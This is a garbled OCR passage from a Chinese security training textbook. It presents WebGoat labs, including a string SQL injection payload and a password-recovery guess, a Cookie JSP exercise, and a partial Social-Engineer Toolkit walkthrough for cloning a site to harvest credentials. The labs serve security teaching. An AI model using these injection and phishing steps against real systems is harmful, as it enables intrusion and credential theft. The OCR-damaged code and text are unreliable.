联 的 数据 库 服务 器 中 去 执行 。 通 过 构造 一 些 畸 形 的 输入 ,攻击 者 能 够 操作 这 种 请 求 语句 去 
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获取 预先 未 知 的 结果 。 

读者 可 以 利用 Burp Suite 功能 对 某 一 网 站 用 户 登 录 的 任意 信息 进行 抓 包 , 然 后 分 析 数 
据 包 。 

2. 跨 站 脚本 攻击 

当 一 个 Web 服务 器 接收 来 自用 户 恶 意 构 造 的 数据 时 ,被 接收 恶意 的 数据 通常 以 超 链 接 
的 形式 嵌入 Web 服务 器 ,该 超 链接 包含 了 恶意 的 内 容 , 如 果 用 户 不 注意 单 击 了 这 些 链接 , 跨 
站 脚本 就 可 能 发 生 。 

恶意 链接 的 来 源 有 可 能 来 自 另 一 个 网 站 的 链接 ,也 有 可 能 来 自 怀 有 恶意 的 邮件 ,或 者 是 
某 些 即时 通信 软件 上 的 消息 链接 等 。 通 常情 况 下 ,攻击 者 会 把 链接 到 恶意 站 点 的 超 链接 中 
的 部 分 内 容 用 二 进 制 或 其 他 编码 方法 进行 编码 ,所 以 当 用 户 单 击 时 不 会 产生 怀疑 。 当 某 些 
敏感 数据 被 网 页 服务 接收 后 , 它 会 向 用 户 产生 一 个 包含 恶意 数据 的 页 面 输出 ,而 这 些 数据 正 
是 攻击 者 之 前 嵌入 网 页 的 。 

跨 站 脚本 是 指 在 远程 Web 页 面 的 HTML 代码 中 插入 的 具有 恶意 目的 的 数据 ,用 户 认 
为 该 页 面 是 可 信赖 的 ,但 是 当 用 户 下 载 该 页 面 时 ,嵌入 其 中 的 脚本 将 被 解释 执行 。 所 以 , 跨 
站 脚本 产生 的 根本 原因 就 在 于 数据 和 代码 的 混合 使 用 。 

3. 文件 上 传 

文件 上 传 是 指 用 户 上 传 了 一 个 可 被 Web 容器 解释 执行 的 脚本 文件 , 即 通过 执行 此 脚本 
可 获得 服务 器 端 权 限 。 某 些 环 境 下 ,这 种 攻击 方式 技术 要 求 不 高 ,相对 其 他 类 型 的 漏洞 更 加 
直接 、 有 效 , 但 是 威胁 程度 址 良和 置疑 。 

4. 目录 遍历 

目录 遍历 又 称 为 路 径 遍历 ,可 以 获取 系统 文件 和 服务 器 的 配置 文件 ,甚至 在 Web 根 目 
录 以 外 执行 系统 命令 。 导 致 目录 遍历 的 原因 是 Web 服务 器 对 用 户 输入 的 字符 过 滤 不 严格 ， 
攻击 者 可 以 通过 HTTP 请 求 输入 一 些 特殊 字符 ,从 而 绕 过 服务 器 的 安全 限制 。 严 格 来 说 ， 
目录 遍历 也 是 设计 人 员 设 计 中 的 “漏洞 ”。 














6.2 Web 安全 漏洞 学 习 平 台 : WebGoat 的 使 用 


6.2.1 预备 知识 : WebGoat 介绍 


WebGoat 是 一 个 用 来 演示 Web 浏览 器 中 典型 安全 漏洞 的 应 用 程序 ,其 目的 是 在 应 用 
程序 安全 审查 的 上 下 文中 系统 、 完 整地 介绍 如 何 测试 和 利用 这 些 安全 漏洞 。 

WebGoat 用 Java 语言 编写 ,可 以 安装 到 所 有 带 有 Java 虚拟 机 环境 的 平台 上 。 此 外 ， 
WebGoat 还 分 别 为 Linux, OS X Tiger 和 Windows 系统 提供 了 相应 的 安装 程序 。 无 论 运 
行 在 什么 操作 系统 平台 上 ,WegGoat 都 会 自动 跟踪 用 户 的 操作 过 程 ,记录 在 平台 上 的 学 习 
进展 。WegGoat 当前 提供 的 训练 课程 有 30 多 个 ,其 中 包括 跨 站 点 脚本 攻击 (XSS) ,访问 控 
制 ,线程 安全 、 操 作 隐藏 字段 \ 操 纵 参 数 、 弱 会 话 Cookie, SQL 盲 注 、 数 字 型 SQL 注入 .字符 
串 型 SQL 注入 .Web 服务 .OpenAuthen-tication、 危 险 的 HTML 注释 等 内 容 。 

虽然 WebGoat 中 对 于 如 何 利用 漏洞 给 出 了 大 量 的 解释 ,但 还 是 比较 有 限 的 。 不 过 ,对 
于 初学 者 来 说 , WegGoat 是 一 个 功能 丰富 、 便 于 使 用 的 学 习 平 台 。 它 的 每 个 教程 都 明确 告 
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诉 读者 存在 什么 漏洞 ,但 是 如 何 去 攻 破 这 些 漏洞 ,还 需要 读者 继续 查阅 相关 资料 ,通过 进 一 
步 学 习 来 了 解 该 漏洞 的 原理 、 特 征 和 攻击 方法 ,甚至 需要 读者 搜集 相关 的 辅助 攻击 工具 , 完 
成 各 种 攻击 过 程 。 


6.2.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 的 学 习 , 能 够 使 读者 掌握 基于 应 用 层 的 弱点 测试 手段 与 方法 ,这 些 方法 对 于 
网 络 攻防 与 防御 是 非常 有 用 的 。 

2. 实验 条 件 

本 实验 不 需要 构建 专门 的 实验 环境 ,只 需 一 台 接 人 互联 网 的 主机 即 可 。 通 过 该 主机 , 利 
用 WebGoat 工具 进行 学 习 。 


6.2.3 实验 过 程 


步骤 1: 正常 登录 实验 用 计算 机 ,在 进行 实验 之 前 确保 该 计算 机 能 够 正常 访问 互联 网 。 
然后 安装 WebGoat 软件 。 安 装 过 程 中 ,首先 需要 部 署 一 个 Java 环境 ,再 安装 WegGoat 的 
软件 包 。 

步骤 2: 打开 Internet Explorer 浏览 器 ,在 地 址 栏 中 输入 “http://localhost/WebGoat/ 
attack”, 在 打开 的 页 面 中 输入 用 户 名 称 和 口令 。 首 次 使 用 时 ,还 需要 进行 在 线 注册 。 

步 又 3: 单 击 Start WebGoat 按钮 ,如 图 6-24 所 示 ,进入 WebGoat 操作 界面 。 
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exercises are intended to provide hands on experience with application penetration testing techniques 


The WebGoat project is lead by Bruce Mayhew. Please send all comments to Bruce at 
WebGoat@owasp.org. 
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图 6-24 单 击 Start WebGoat 按钮 


步骤 4: 首先 进行 字符 串 型 SQL 注入 实验 。 在 左 侧 列 表 中 选择 String SQL Injection 
选项 ,如 图 6-25 所 示 ,在 其 上 单 击 进入 该 页 面 。 
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Welcome to a short introduction to WebGoat. 
Here you will learn how to use WebGoat and additional tools for the lessons. 
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6-25 ”选择 String SQL Injec! 


步骤 5. 进入 如 图 6-26 所 示 的 操作 窗口 ,在 用 户 提交 信息 的 窗口 中 可 以 看 到 提示 的 
SQL 语言 : SELECT * FROM user. data WHERE last, name = ' Your Name ' ,该 测试 项 
为 String SQL Injection: X} F SQL 语句 中 的 “' "字符 , 它 作 为 查询 参数 的 左 闭合 符号 ,可 以 
在 Your Name 中 输入 *'” 使 其 闭合 。 
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Buffer Overflows behind an attack are easy to learn and the damage caused can range from considerable to 
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Conoxrenoy internet are susceptible to this form of attack. 


Cross-Site Scripting (XSS) 
Denial of Service 
Improper Error Handling 
Injection Flaws 


Not only is it a threat easily instigated it is also a threat that, with a little common-sense anc 
forethought, can easily be prevented. 


It is always good practice to sanitize all input data, especially data that will used in OS 
Command Injection. command, scripts, and database queiries, even if the threat of SQL injection has been 


UTE prevented in some other manner. 


ss General Goal(s): 

Log Spoofing 

XPATH Injection The form below allows a user to view their credit card numbers. Try to inject an SQL string 
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图 6-26 用 户 提交 信息 窗口 
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读者 可 以 输入 'or'1' = "1, 这样, 原来 SQL 语句 中 的 %'” 就 作为 *'1” 的 右 闭合 符号 , 音 
击 Go! 按钮 。 

步骤 6: 然后 看 到 读者 此 次 输入 所 产生 的 SQL 查询 命令 ,这 样 就 得 到 了 所 有 的 用 户 列 
表 。 该 攻击 完成 , 左 侧 的 String SQL Injection 前 出 现 了 绿色 的 “V”, 如 图 6-27 所 示 。 
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图 6-27 显示 得 到 的 所 有 用 户 列表 


下 面 请 读者 进行 Forgot Password 项 的 攻击 学 习 。 

步骤 7: 在 左 侧 列表 中 找到 Forgot Password 选项 ,如 图 6-28 所 示 ,在 其 上 单 击 进 入 该 
页 面 。 

步骤 8: 通常 情况 下 程序 员 都 会 采用 有 意义 的 名 称 作为 表 名 和 字段 名 。 例 如 ,管理 员 表 
为 admin, JKH news, M AMEA guestbook 或 guest, 文 章 系统 表 为 article, 等 等 。 因 此 ， 
在 这 里 可 以 利用 一 些 经 验 和 可 能 的 猜测 回答 来 破解 系统 ,从 而 获取 用 户 密码 。 在 User 
Name 后 面 的 文本 框 中 读者 可 以 尝试 输入 一 个 用 户 名 ,如 输入 “admin”, 然 后 单 击 Submit 按 
钮 ,如 图 6-29 所 示 。 

步骤 9: 在 出 现 的 如 图 6-30 所 示 的 窗口 中 ,说 明 用 户 名 admin 已 经 存在 ,现在 要 求 回答 
认证 问题 。 根 据 提示 ,尝试 获取 用 户 admin 对 应 的 密码 .首先 尝试 输入 “yellow”, 发 现 并 没 
有 通过 ; 再 尝试 输入 “green”, 发 现 通过 ,得 到 了 admin 账户 的 密码 为 2275 $ starBoOrn3 ,如 
图 6-31 所 示 。 


6.2.4 任务 与 思考 


随 着 网 络 安全 威胁 越 来 越 引 起 社会 各 界 的 普遍 重视 ,一 些 安全 机 构 开 发 了 一 些 非常 优 
秀 的 在 线 开 放 实 验 实 训 平台 ,利用 这 些 平 台 , 可 以 较为 系统 、 全 面 地 学 习 有 关 的 安全 知识 。 
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图 6-28 选择 Forgot Password 选项 
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WegGoat 是 一 个 非常 优秀 和 广 受 网 络 安全 界 关注 的 平台 ,该 平台 提供 了 非常 丰富 的 内 
容 , 这 些 内 容 包 括 有 关 Web 攻击 与 防范 的 主要 知识 。 与 普通 的 学 习 平台 相 比 , 该 平台 提供 
了 和 良好 的 在 线 互 动 和 在 线 帮助 功能 ,很 适合 初学 者 使 用 。 

通过 WegGoat 工具 的 学 习 , 可 以 给 读者 一 定 的 启发 : 充分 利用 互联 网 上 的 开放 平台 资 
源 , 很 多 平台 都 提供 了 几乎 与 现实 互联 网 应 用 环境 中 相同 的 有 关 安 全 问题 的 解决 方法 和 思 
路 ,通过 系统 的 学 习 ,读者 不 仅 能 掌握 有 关 安全 问题 的 原理 和 解决 方案 ,还 可 扩展 知识 面 , 开 
拓 学 习 视 野 。 





6.3 Cookie 对 象 操作 


6.3.1 预备 知识 : 关于 Cookie 


Cookie 是 指 某 些 网 站 为 了 记录 和 辨别 用 户 身 份 ,存储 在 用 户 端 计算 机 上 的 文件 。 
Cookie 的 格式 实际 上 是 一 段 纯 文本 信息 ,由 服务 器 随 着 网 页 一 起 发 送 到 客户 端 ,并 保存 在 
客户 端 硬盘 的 指定 目录 中 。 有 人 认为 Cookie 会 造成 严重 的 安全 威胁 ,但 事实 并 非 如 此 。 服 
务 器 读 取 Cookie 时 ,只 能 读 取 到 与 该 服务 器 相关 的 信息 。Cookie 永远 不 会 以 任何 方式 执 
行 ,因此 也 不 会 带 来 病毒 或 攻击 用 户 的 系统 , 且 Cookie 具有 时 效 性 。 例 如 , 当 用 户 设置 了 
Cookie 的 存活 时 间 为 1 分 钟 时 ,1 分 钟 后 这 个 Cookie 就 会 被 浏览 器 自动 删除 。 

Cookie 给 网 站 和 用 户 带 来 的 好 处 很 多 ,如 : 

(1) Cookie 能 使 站 点 跟踪 特定 访问 者 的 访问 次 数 、 最 后 访问 时 间 等 信息 。 

(2) Cookie 能 告诉 在 线 广 告 商 广告 被 单 击 的 次 数 ,从 而 可 以 更 精确 地 投放 广告 。 

(3) Cookie 在 有 效 期 限 未 到 时 ,能 够 使 用 户 在 不 需要 重复 输入 用 户 名 和 密码 的 情况 下 
进入 曾经 浏览 过 的 一 些 站 点 。 

(4) Cookie 能 够 帮助 站 点 统计 用 户 个 人 资料 以 实现 各 种 各 样 的 个 性 化 服务 ,也 可 以 使 
用 Cookie 来 编写 一 些 功 能 较 强 的 应 用 程序 。 

不 过 ,Cookie 也 存在 安全 问题 ,攻击 者 可 以 分 析 存 放 在 本 地 的 Cookie 文件 ,并 进行 
Cookie 欺骗 攻击 。 


6.3.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,在 熟悉 Cookie 组 成 及 工作 原理 的 基础 上 ,通过 具体 操作 ,掌握 Cookie 的 
产生 过 程 、 应 用 特点 和 安全 管理 方法 。 

2. 实验 条 件 

本 实验 可 以 在 任意 一 人 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 运行 。 为 了 提高 程 
序 的 编写 和 修改 效率 ,可 以 安装 较为 专业 的 文本 编辑 器 EditPlus ,替代 Windows 操作 系统 
中 的 “记事 本 ”。 
6.3.3 实验 过 程 


步骤 1: 登录 到 实验 用 计算 机 。 本 实验 中 ,通过 Cookie 保存 用 户 提交 的 信息 中 包括 以 
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Pra ae с 
(1) usingCookie. html, usingCookie. html 是 一 个 HTML 表单 ,其 中 设置 了 几 种 可 供 
用 户 选择 及 输入 数据 表单 的 选项 。usingCookie. html 文件 代码 为 : 


<html> 
< head> 
<title> 运 用 Cookie </title> 
< meta http – equiv = "keywords" content = "keyword1, keyword2, keyword3"> 
< meta http- equiv = "description" content = "this is my page"> 
< neta http - equiv = "content - type" content = "text/html; charset = gb2312"> 
</head> 
<body> 
< h2 align = "center"> 用 户 信息 </h2 > 
< form method = "post" action = "usingCookie. jsp" > 
< table border = 1 align = "center"> 
«tr» 
<td> 姓 名 : </td> 
< td>< input type = "text" name = "name"/></td> 
</tr> 
<tr> 
<td> 性 别 : </td> 
<td> 男 < input type = "radio" name = "sex" value = "М" checked> 女 < input type = "radio" 
папе = "sex" value = "F"></td> 
</tr> 
<tr> 
<td> 喜 好 颜色 : </td> 
<td> 
< select size = 1 папе = "color"> 
< option selected> none 
< option > blue 
< option > green 
< option red 
< option > yellow 
</select> 
</td> 
</tr> 
<tr colspan = "2" align = "center"> 
<td>< input type = "submit" value = "发 送 资料 "/></td> 
</tr> 
</table> 
</form> 
</body> 
</html> 


(2) usingCookie. jsp。 接 收 usingCookie. html 表单 传送 过 来 的 变量 数据 ,并 将 这 些 数 
据 存 人 Cookie 中 ,然后 将 网 页 定向 到 responseCookie. jsp. usingCookie. jsp 文件 代码 为 : 
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<html> 
< head> 
< base href = "< % = basePath % >"> 
<title> 运 用 Cookie </title> 
< meta http- equiv = "pragma" content = "no - cache"> 
< meta http- equiv = "cache – control" content = "no – cache"> 
«meta http – equiv 
< meta http – equiv = "keywords" content = "keyword1, keyword2, keyword3"> 


"expires" content = "0"> 





< meta http- equiv = "description" content = "This is my page"> 
= == 
< link rel = "stylesheet" type = "text/css" href = "styles.css"> 
--> 

</head> 

< body> 
<% 
String strname = request. getParameter("name"); 
String strsex = request. getParameter("sex"); 
String strcolor - request. getParameter("color"); 
Cookie nameCookie = new Cookie("name", java. net. URLEncoder. encode( strname) ) ; 
Cookie sexCookie = new Cookie("sex",strsex); 
Cookie colorCookie = new Cookie("color",strcolor); 
nameCookie. setMaxAge(30) ; 
sexCookie. setMaxAge(30) ; 
colorCookie. setMaxAge(30) ; 
response. addCookie(nameCookie); 
response. addCookie(sexCookie); 
response. addCookie(colorCookie); 
response. sendRedirect("responseCookie. jsp") ; 

$> 
</body> 
</html> 


(3) responseCookie. jsp. Web 应 用 程序 会 读 取 存储 在 Cookie 中 的 用 户 数据 ,并 根据 


需要 经 变化 后 输出 到 浏览 器 。responseCookie. jsp 文件 代码 为 : 





<html> 
<head> 
< base href = "<% = basePath%>"> 
< title > 获取 cookie 资料 </title> 
< meta http – equiv = "pragma" content = "по – cache" 
< neta http – equiv = "cache - control" content = "по – cache"> 
< meta http- equiv = "expires" content = "0"> 
< meta http - equiv = "keywords" content = "keyword1, keyword2, keyword3"> 
«meta http - equiv = "description" content = "This is my page"> 
</head> 
<body> 
<% 
Cookie cookies[] = request.getCookies(); 
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if(cookies == null) 
out. print(" 没 有 cookie"); 


else 
{ 
try 
í 
if(cookies.length == 0) 
{ 
System. out.println(" 客 户 端 禁止 写 和 人 cookie"); 
) 
else 
{ 
int Count = cookies. length; 
String name="",sex="",color=""; 
for(int і = 0;i<Count;i++) 
if(cookies[i].getName().equals("name")) 
name = cookies[i].getValue(); 
else if(cookies[i].getName(). equals("sex")) 
sex = cookies[ i]. getValue(); 
else if(cookies[i].getName(). equals("color")) 
color = cookies[ i].getValue(); 
第 > 


< font color = "<% = color $>" size=5> 
<% = URLDecoder. decode(name) % > 
«/font» 
您 好 .以 下 是 您 的 个 人 资料 …..<P> 
<% 
out. println(" 性 别 : <br>"); 
if(sex.equals("M")) 
out. println("« img src = 'images/boy. png'> 我 是 男生 ..<p> "); 
else 
out. println("« ing src = 'images/gril. jpg '> 我 是 女生 ..<р> "); }} 
catch(Exception e) 
{ 
System. out. println(e); 
) 
) %> 
</body> 
</html> 


将 以 上 usingCookie. html, usingCookie. jsp 和 responseCookie. jsp 文件 保存 在 Web123 
文件 夹 中 。 

步骤 2: 在 浏览 器 地 址 栏 中 输入 “192. 168. 1. 156:8080/ web123/usingCookie. html”, IJ 
运行 usingCookie. html 文件 ,显示 如 图 6-32 所 示 的 对 话 框 。 其 中 ,192. 168. 1. 156 是 本 机 
f IP 地 址 ,也 可 以 修改 为 计算 机 名 ; 8080 为 设置 的 页 面 打开 端口 号 。 

步骤 З. 在 浏览 器 地 址 栏 中 输入 “192. 168. 1. 156:8080/web123/responseCookie. jsp". 
打开 如 图 6-33 所 示 的 窗口 ,说 明 暂 时 没有 Cookie. 
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€ 3 Q |D 192.168.1.156:8080/veb/usingCookie.htnl 
[ Windors [) Windows Media 门 免费 Hotmail Г 自 定义 链接 门 从 IE 中 导入 


а = 


用 户 信息 

























































































图 6-32 ”运行 usingCookie. html 文件 后 显示 的 信息 
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€ > C (D) 192.168. 1. 156:8080/veb/responseCocki e. jsp 
[l Windows [Windows Media Г) 免费 Motesil Г) БУЕ O 从 IE 中 导入 
TUB cookie 





图 6-33 暂时 没有 Cookie 


步 又 4: 重新 在 浏览 器 中 运行 usingCookie. html, 并 填写 一 些 信息 ,如 图 6-34 所 示 。 










































































y D) 运用 Cookie 
€ 3 Q 0 192.168. 1. 156:8080/web/usingCookie. htal 三 
[) findows [7] Windows Media [7 免费 Moteail [ 自 定义 链接 С) 从 IE 中 导入 
用 户 信息 

p. xiaofang 

性 别 ， [BOX © 

EFE. [ed _ 

发 送 资料 
R 











图 6-34 输入 表单 信息 


步骤 5: 单 击 * 发 送 资料 ”按钮 ,运行 responseCookie. jsp 后 ,Cookie 值 已 经 显示 在 页 面 
中 ,如 图 6-35 所 示 。 


步骤 6: 运行 usingCookie. html 后 ,修改 一 些 信息 。 例如 ,将 “喜好 颜色 ”由 red 改 为 
green, Ш 6-36 所 示 。 


步骤 7: 单 击 “ 发 送 资料 ”按钮 ,可 以 看 到 Cookie 值 发 生 了 变化 ,如 图 6-37 所 示 。 
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ЕЕЕ x 


€ > C |D 192.168.1.156:8080/veb/responseCookie. jsp 三 
[l Winaows [] Windows Media [] 免费 Hotmail [7 自 定义 链接 C) A IE PA 








xiaofang 您 好 。 以 下 是 您 的 个 人 资料 .…... 


性 别 ， 
EREA.. 











图 6-35 已 经 显示 存在 Cookie 值 


€ -> CŒ |D 192. 168. 1, 156:8080/veb/usingCookie. html =] 
С) Yindows [7] Windows Media [ 免费 hotnsil Г BENER O А IE 中 导入 


用 户 信息 


[ют — — |] 
|i. [веко 
好 颜色 ，||[green m 










































































图 6-36 修改 表单 信息 





D] Blicooki 资料 


€ > Q Г 192. 168. 1. 156:8080/veb/responseCocki e. jsp. 三 
С Windows [7] Windows Media 门 免费 Moteail Г 自 定 义 链接 С) 从 IE 中 导入 





xiaoming 您 好 。 以 下 是 您 的 个 人 资料 .….… 
性 别 : 
PRESE.. 

R 





6-37 Cookie 的 值 发 生 了 变化 


6.3.4 任务 与 思考 
在 该 实验 的 基础 上 ,读者 可 以 进一步 学 习 有 关 Cookie 的 知识 。 
1. Cooke 的 设置 方式 


HttpServletResponse 的 addCookie 方法 提供 了 Cookie 设置 功能 ,使 用 addCokie 方法 可 以 
将 Cookie 加 入 Set-Cookie 应 答 头 中 ,如 Cookie userCookie = new Cookie( "user", "admin"), 
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response. addCookie( userCookie) 等 。 与 Cookie 设置 有 关 的 操作 还 包括 setMaxAge 和 
setPath 。 

(D setMaxAge。setMaxAge 用 于 设置 Cookie 过 期 之 前 的 时 间 , 以 秒 计 算 。 如 果 不 设 
置 该 值 , 则 Cookie 只 在 当前 会 话 内 有 效 ,而 且 这 些 Cookie 不 会 保存 到 磁盘 上 。 

注意 : 删除 Cookie 就 是 通过 该 方法 实现 的 。 将 要 删除 Cookie 过 期 之 前 的 时 间 指 定 为 
0, 就 可 以 达到 删除 该 Cookie 的 目的 。 

(2) setPath。setPath 用 于 设置 Cookie 适用 的 路 径 。 如 果 不 指定 路 径 ,Cookie 将 返回 
当前 页 面 (JSP 页 面 或 Servlet 的 映射 ) 所 在 的 目录 。 对 于 Cookie 路 径 的 设置 ,还 需要 注意 
以 下 4 点 。 

(D 所 有 的 Cookie 都 是 有 路 径 的 。 

© 该 方法 设置 的 路 径 为 客户 端 路 径 , 即 “/” 代 表 服 务 器 根 目录 。 

O 该 方法 设置 路 径 时 ,/myWeb/ 与 /myWeb 是 不 同 的 ,前 者 可 以 关联 到 服务 器 的 
myWeb 目录 下 ,而 后 者 则 不 可 以 。 

(D 该 方法 设置 路 径 时 ,没有 相对 目录 的 说 法 , 即 不 论 在 哪个 目录 下 设置 
setPath(/myWeb/) ,该 Cookie 都 将 关联 到 服务 器 的 my Web 目录 下 (setPath(/myWeb) 则 
不 可 以 ) ,而 不 是 当前 目录 的 myWeb 的 子 目 录 下 ; 同样 ,设置 setPath(myWeb/) 和 setPath 
(myWeb) 也 不 能 关联 到 当前 目录 的 myWeb 的 子 目录 下 。 

大 多 数 情况 下 ,如 果 无 法 成 功 删除 Cookie, 主 要 原因 与 目录 的 不 正确 配置 有 关 。 一 个 
常见 原因 是 在 某 一 个 目录 中 设置 了 Cookie( 没 有 调用 setPath 方法 ) , 却 在 另 一 个 目录 中 删 
除 该 Cookie( 其 实 是 调用 setrMaxAge 方法 )。 

2. Cookie 的 读 取 

从 客户 端 读 取 Cookie 时 调用 的 是 HttpServletRequest 的 getCookies 方法 。 该 方法 返 
回 一 个 与 НТТР 请 求 头 中 内 容 相 对 应 的 Cookie 对 象 数组 。 得 到 这 个 数组 之 后 ,一 般 可 通 
过 循环 方式 访问 其 中 的 各 个 元 素 , 调 用 getName 检查 各 个 Cookie 的 名 称 , 直 至 找到 目标 
Cookie。 然 后 对 这 个 目标 Cookie 调用 getValue, 根 据 获得 的 结果 进行 其 他 处 理 。 

需要 注意 的 是 ,如 果 JSP 和 Servlet 所 在 目录 (Servlet 为 其 映射 目录 ) 的 父 目 录 中 有 同 
名 Cookie, 则 request. getCookie() 方 法 得 到 的 Cookie 数组 中 保存 的 是 其 父 目 录 中 Cookie 
的 信息 。 


6.4 网 络 钓鱼 攻击 


6.4.1 预备 知识 : 了 解 网 络 钓 鱼 


网 络 钓鱼 (phishing) 由 钓鱼 (fishing) 一 词 演变 而 来 。 在 网 络 钓鱼 过 程 中 ,攻击 者 使 用 
诱饵 (如 电子 邮件 .手机 短信 、QQ 链接 等 ) 将 攻击 代码 发 送 给 大 量 用 户 , 期 竺 少数 安全 意识 
IHP“ EJ" ,进而 达到 “钓鱼 "( 如 窃取 用 户 的 隐私 信息 ) 的 目的 。 

网 络 钓鱼 的 具体 实施 过 程 为 : 不 法 分 子 利用 各 种 手段 ,仿冒 真实 网 站 的 URL 地 址 及 页 
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面 内 容 ,或 者 利用 真实 网 站 服务 器 程序 上 的 漏洞 ,在 站 点 的 某 些 网 页 中 插入 危险 的 HTML 
代码 ,以 此 来 骗取 用 户 银行 卡 或 信用 卡 账号 、 密 码 等 私人 资料 。 

国际 反 网 络 钓 鱼 工作 组 (Anti-Phishing Working Group, APWG) 给 网 络 钓鱼 的 定义 
Ж: 网 络 钓鱼 是 一 种 利用 社会 工程 学 和 技术 手段 窃取 用 户 个 人 身份 数据 和 财务 账户 凭证 的 
网 络 攻击 方式 。 采 用 社会 工程 学 手段 的 网 络 钓鱼 攻击 往往 是 向 用 户 发 送 冒 充 合法 企业 或 机 
构 的 欺骗 性 电子 邮件 .手机 短信 等 ,引诱 用 户 回复 个 人 敏感 信息 或 单 击 其 中 的 链接 访问 伪造 
的 网 站 ,进而 泄露 凭证 信息 (如 用 户 名 、 密 码 、 账 号 ID РІМ 码 或 信用 卡 详细 信息 等 ) 或 下 载 
恶意 软件 。 而 技术 手段 的 攻击 则 是 直接 在 个 人 计算 机 上 移植 恶意 代码 ,采用 某 些 技术 手段 
直接 窃取 和 凭证 信息 ,如 使 用 专门 开发 的 软件 拦截 用 户 的 用 户 名 和 密码 ,误导 用 户 访问 伪造 的 
网 站 等 。 

网 页 挂 马 和 钓鱼 网 站 是 恶意 网 址 的 两 个 主要 形式 。 但 是 单纯 的 钓鱼 网 站 由 于 本 身 不 包 
含 恶 意 代码 ,因此 很 难 被 传统 的 安全 技术 方法 所 识别 。 另 外 , 绝 大 多 数 钓鱼 网 站 设 在 境外 ， 
因此 很 难 通 过 法 律 手段 进行 有 效 的 打击 。 


6.4.2 实验 目的 和 条 件 











1. 实验 目的 

通过 网 络 钓鱼 实验 ,使 读者 掌握 一 种 钓鱼 网 站 的 搭建 方式 和 过 程 ,加深 对 网 络 钓鱼 攻 刘 
的 理解 ,进一步 培养 防范 网 络 钓鱼 攻击 的 能 力 。 

2. 实验 条 件 

本 实验 所 需要 的 软 硬 件 清 单 如 表 6-2 所 示 。 


表 6-2 网 络 钓鱼 攻击 实验 清单 





Et 























类 型 序 号 软 硬 件 要 求 я № 
1 数量 1 台 
攻击 机 2 操作 系统 版 本 BackTrack 5(BT5) 
3 软件 版 本 social-engineer-toolkit 
1 数量 1f 
UL 2 操作 系统 版 本 Windows XP 
3 软件 版 本 无 














6.4.3 实验 过 程 


步骤 1: 正常 登录 到 实验 场景 中 运行 BT5 操作 系统 的 攻击 机 ,如 果 进 入 的 是 命令 行 界 
面 ,可 输入 “startx” 命 令 切 换 到 图 形 界面 ,如 图 6-38 所 示 。 

步骤 2: 打开 终端 窗口 .输入 “cd /pentest/exploits/set/” 命 令 , 切换 到 /pentest/ 
exploits/set/ 目 录 , 如 图 6-39 所 示 。 

步骤 3: 输入“. /set" 命 令 ,启动 set 工具 。 当 出 现 Do you agree to the terms of service 
[Ly/nj: 信 息 时 ,输入 “y”, 表 示 同 意 ,如 图 6-40 所 示 。 


cg 


第 6 章 Web 浏览 器 攻防 实 训 233 





Applications Places System as] 


习 Tue Aug б, 2:34АМ 


ZA 


Install BackTrack 





Æ 6-38 BTS 图 形 界面 


ДЕ: rootGbt: /pentest/exploits/set 
File Edit View Terminal Help 


pentest/exploit 

readme set set-proxy 

reports set-automate set-update 
:/pentest/exploits/set# 





6-39 ”切换 到 /pentest/exploits/set/ 目 录 
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x root@bt: /pentest/exploits/set 
File Edit View Terminal Help 
EV Е. à 


The above licensi s taken from the BSD Licensing-aad is applied to Social-En| 
gineer Toolkit 


the Social-Engineer Toolkit is provided as. s7 and iswa royalty free ol 
rce application. 


u ange, market, whatever you ма with it as 19% а 
s you give t propriate credit where cr 
is due (which means giving the authors the c deserve Wamaskikinq it). 
Also note that by using this softwar 
to giye him Ftrogang by nih 
ENTE аспа 9-5 DC NETT. 
Поа регіо to 0-4 її ш [г 3 


ро you agree to the terms of service [у/п]: у 





图 6-40 同意 启动 相应 的 服务 


步骤 4: 当 进 入 如 图 6-41 所 示 的 欢迎 界面 时 ,选择 1)Social-Engineering Attacks 选项 ， 
即 社会 工程 学 攻击 方式 。 
-一 一 一 一 一 一 一 一 -一 一 
root@bt /pentest/exploits/set 


File Edit View Terminal Help 
] Homepage: https://www.trustedsec.com 


Welcome to the Ѕосіа1 -Епдіт Toolkit (SET) —Yeussane. 
stop shop for all of your social-engineering needs 


Join us on irc.freenode.net in u olkik 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www.trustedsec.com 
Select from the menu 


1) Ѕосіа1-Ейділеесі 
ulii amr 8 27-4090 | 
Зу Th Pali P Mddles 
4) Update the Metasploit Framewo[k 
5) Update the Sociat-Engineer Toolkit 
SET configuration 
redits, and Abou 


Exit the Social-Engineer Tool 





图 6-41 选择 社会 工程 学 攻击 方式 





选择 2)Website Attack Vectors 选项 , 即 以 














步骤 5: 在 出 现 的 如 图 6-42 所 示 的 界面 中 
网 站 为 载体 攻击 的 方式 。 
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步骤 6: 在 出 现 的 如 图 6-43 所 示 的 界面 中 选择 4) Tabnabbing Attack Method i£ 








root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


The Social-Engineer Toolkit is a product of TrustedSec. 
Visit: https://www.trustedsec.com 
Select from the menu 
1) Spear-Phishing Attack 


2) Website Attack Vectors 


5) Mass Ма ес Attack 

"Ab un Pash Aafk vador 

Th SM офа ®х@сКыуе dtas 

8) wireless Access Point Attack fector 
9) QRCode G 


图 6-42 选择 以 网 站 为 载体 攻击 





标签 钓鱼 方法 。 


3j 





3j 


bt: /pentest/exploits/set 
File Edit View Terminal Help 
and the Back|Track This method util 
make th Y \ а 
a window pops up then is ге 
the link replacement 


Credential Harvester/Tabnabbing, and t 
all at once to s wh. u sful. 


1) Java Applet Attack Method 

2) Metasplajt Br r Explpit ш 

3) Credent А аск Methodi 

"АГ ш CB osea ДШ. 

Зу маймен бе1е аск метод 

6) Web Jacking Attack Method 

7) Multi-Attack Web Method 

8) Victim Web Profi 

9) Create or import a CodeSigning Certificate 


99) Return to Main Menu 





图 6-43 选择 标签 钓鱼 方法 


PIRKT: 在 出 现 的 如 图 6-44 所 示 的 界面 中 选择 2)Site Cloner 选项 , 即 网 站 克隆 方式 。 
DIR 8: 在 出 现 的 如 图 6-45 所 示 界 面 的 IP address for the POST back in Harvester/ 











Tabnabbing :后面 直接 输入 本 机 的 IP 地 址 。 
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root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


9) Create or import a CodeSigning Certificate 
99) Return to Main Menu 


ack>4 


The first method will allow SET to import a list^of pre-defingf web 
applications that it can utilize within the átta 


